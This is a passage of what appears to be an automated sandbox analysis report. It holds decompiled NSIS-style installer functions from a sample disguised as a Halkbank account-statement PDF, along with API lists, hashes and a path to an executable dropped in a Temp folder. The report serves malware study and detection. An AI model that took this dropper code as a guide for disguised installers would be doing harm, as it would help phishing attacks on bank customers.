						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                      0x00402fa3
                                                      0x00402fb1
                                                      0x00402fb7
                                                      0x00402fb7
                                                      0x00402fc5
                                                      0x00402fc7
                                                      0x00402fd3
                                                      0x00402fd8
                                                      0x00402fda
                                                      0x00402fda
                                                      0x00402fe5
                                                      0x00402ff5
                                                      0x00403007
                                                      0x00403007
                                                      0x0040300f

                                                      APIs
                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                      • wsprintfW.USER32 ref: 00402FE5
                                                      • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                      • SetDlgItemTextW.USER32 ref: 00403007
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                      • API String ID: 1451636040-1158693248
                                                      • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                      • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                      • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                      • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                      0x00402950
                                                      0x00402952
                                                      0x00402957
                                                      0x0040295c
                                                      0x0040295f
                                                      0x00402969
                                                      0x0040296d
                                                      0x0040296d
                                                      0x00402973
                                                      0x00402980
                                                      0x00402988
                                                      0x0040298b
                                                      0x00402997
                                                      0x0040299a
                                                      0x004029a0
                                                      0x004029ae
                                                      0x004029b3
                                                      0x004029b7
                                                      0x004029ba
                                                      0x004029c3
                                                      0x004029cf
                                                      0x004029d3
                                                      0x004029d6
                                                      0x004029e0
                                                      0x004029ff
                                                      0x004029e7
                                                      0x004029ec
                                                      0x004029f4
                                                      0x004029f7
                                                      0x004029fc
                                                      0x004029fc
                                                      0x00402a06
                                                      0x00402a06
                                                      0x00402a13
                                                      0x00402a19
                                                      0x00402a1f
                                                      0x00402a1f
                                                      0x004029b7
                                                      0x00402a33
                                                      0x00402a35
                                                      0x00402a35
                                                      0x00402a3f
                                                      0x00402a40
                                                      0x00402a44
                                                      0x00402a48
                                                      0x00402a4e
                                                      0x00402a4e
                                                      0x00402a55
                                                      0x004022f1
                                                      0x00402c2d
                                                      0x00402c39

                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                      • GlobalFree.KERNEL32 ref: 00402A06
                                                      • GlobalFree.KERNEL32 ref: 00402A19
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                      • String ID:
                                                      • API String ID: 2667972263-0
                                                      • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                      • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                      • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                      • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















                                                      0x00404e7a
                                                      0x00404e7f
                                                      0x00404e87
                                                      0x00404e88
                                                      0x00404e95
                                                      0x00404e9d
                                                      0x00404e9e
                                                      0x00404ea0
                                                      0x00404ea2
                                                      0x00404ea4
                                                      0x00404ea7
                                                      0x00404ea7
                                                      0x00404eae
                                                      0x00404eb4
                                                      0x00404eb4
                                                      0x00404ebb
                                                      0x00404ec2
                                                      0x00404ec5
                                                      0x00404ec8
                                                      0x00404ec8
                                                      0x00404ecc
                                                      0x00404edc
                                                      0x00404ede
                                                      0x00404ee1
                                                      0x00404e8a
                                                      0x00404e8a
                                                      0x00404e91
                                                      0x00404e91
                                                      0x00404ee9
                                                      0x00404ef4
                                                      0x00404f0a
                                                      0x00404f1b
                                                      0x00404f37

                                                      APIs
                                                      • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                      • wsprintfW.USER32 ref: 00404F1B
                                                      • SetDlgItemTextW.USER32 ref: 00404F2E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s$H7B
                                                      • API String ID: 3540041739-107966168
                                                      • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                      • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                      • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                      • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 48%
                                                      			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                      0x00402eb4
                                                      0x00402ebd
                                                      0x00402ec6
                                                      0x00402ed2
                                                      0x00402edb
                                                      0x00402ee5
                                                      0x00402f0a
                                                      0x00402f10
                                                      0x00402f15
                                                      0x00402f16
                                                      0x00402f46
                                                      0x00402f1f
                                                      0x00402f21
                                                      0x00402f71
                                                      0x00402f74
                                                      0x00000000
                                                      0x00402f7a
                                                      0x00402f30
                                                      0x00402f35
                                                      0x00402f37
                                                      0x00000000
                                                      0x00000000
                                                      0x00402f3f
                                                      0x00402f44
                                                      0x00402f45
                                                      0x00402f45
                                                      0x00402f52
                                                      0x00402f5a
                                                      0x00402f61
                                                      0x00000000
                                                      0x00402f8a
                                                      0x00000000
                                                      0x00402f69
                                                      0x00402ef5
                                                      0x00402f08
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00402f08
                                                      0x00402f90

                                                      APIs
                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: CloseEnum$DeleteValue
                                                      • String ID:
                                                      • API String ID: 1354259210-0
                                                      • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                      • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                      • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                      • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                      0x00401d81
                                                      0x00401d85
                                                      0x00401d9a
                                                      0x00401d87
                                                      0x00401d89
                                                      0x00401d8f
                                                      0x00401d8f
                                                      0x00401da0
                                                      0x00401da3
                                                      0x00401dad
                                                      0x00401db0
                                                      0x00401db8
                                                      0x00401dc9
                                                      0x00401dcc
                                                      0x00401dd7
                                                      0x00401dce
                                                      0x00401dd0
                                                      0x00401dd0
                                                      0x00401ddb
                                                      0x00401de5
                                                      0x00401e0c
                                                      0x00401e1b
                                                      0x00401e29
                                                      0x00401e31
                                                      0x00401e39
                                                      0x00401e39
                                                      0x00401e42
                                                      0x00401e48
                                                      0x00402ba4
                                                      0x00402ba4
                                                      0x00402c2d
                                                      0x00402c39

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                      • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                      • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                      • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 73%
                                                      			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                      0x00401e4e
                                                      0x00401e59
                                                      0x00401e5b
                                                      0x00401e68
                                                      0x00401e7f
                                                      0x00401e84
                                                      0x00401e91
                                                      0x00401e96
                                                      0x00401e9a
                                                      0x00401ea5
                                                      0x00401eac
                                                      0x00401ebe
                                                      0x00401ec4
                                                      0x00401ec9
                                                      0x00401ed3
                                                      0x00402638
                                                      0x0040156d
                                                      0x00402ba4
                                                      0x00402c2d
                                                      0x00402c39

                                                      APIs
                                                      • GetDC.USER32(?), ref: 00401E51
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                      • ReleaseDC.USER32 ref: 00401E84
                                                        • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                        • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                      • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                      • String ID:
                                                      • API String ID: 2584051700-0
                                                      • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                      • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                      • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                      • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 59%
                                                      			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                      0x00401c43
                                                      0x00401c45
                                                      0x00401c4c
                                                      0x00401c4f
                                                      0x00401c52
                                                      0x00401c5c
                                                      0x00401c60
                                                      0x00401c63
                                                      0x00401c6c
                                                      0x00401c6c
                                                      0x00401c6f
                                                      0x00401c73
                                                      0x00401c7c
                                                      0x00401c7c
                                                      0x00401c7f
                                                      0x00401c83
                                                      0x00401c85
                                                      0x00401cda
                                                      0x00401cdc
                                                      0x00401ce7
                                                      0x00401cf1
                                                      0x00401cf4
                                                      0x00401cf4
                                                      0x00401cfd
                                                      0x00000000
                                                      0x00401c87
                                                      0x00401c8e
                                                      0x00401c90
                                                      0x00401c93
                                                      0x00401c99
                                                      0x00401ca0
                                                      0x00401ca3
                                                      0x00401ccb
                                                      0x00401d03
                                                      0x00401d03
                                                      0x00401ca5
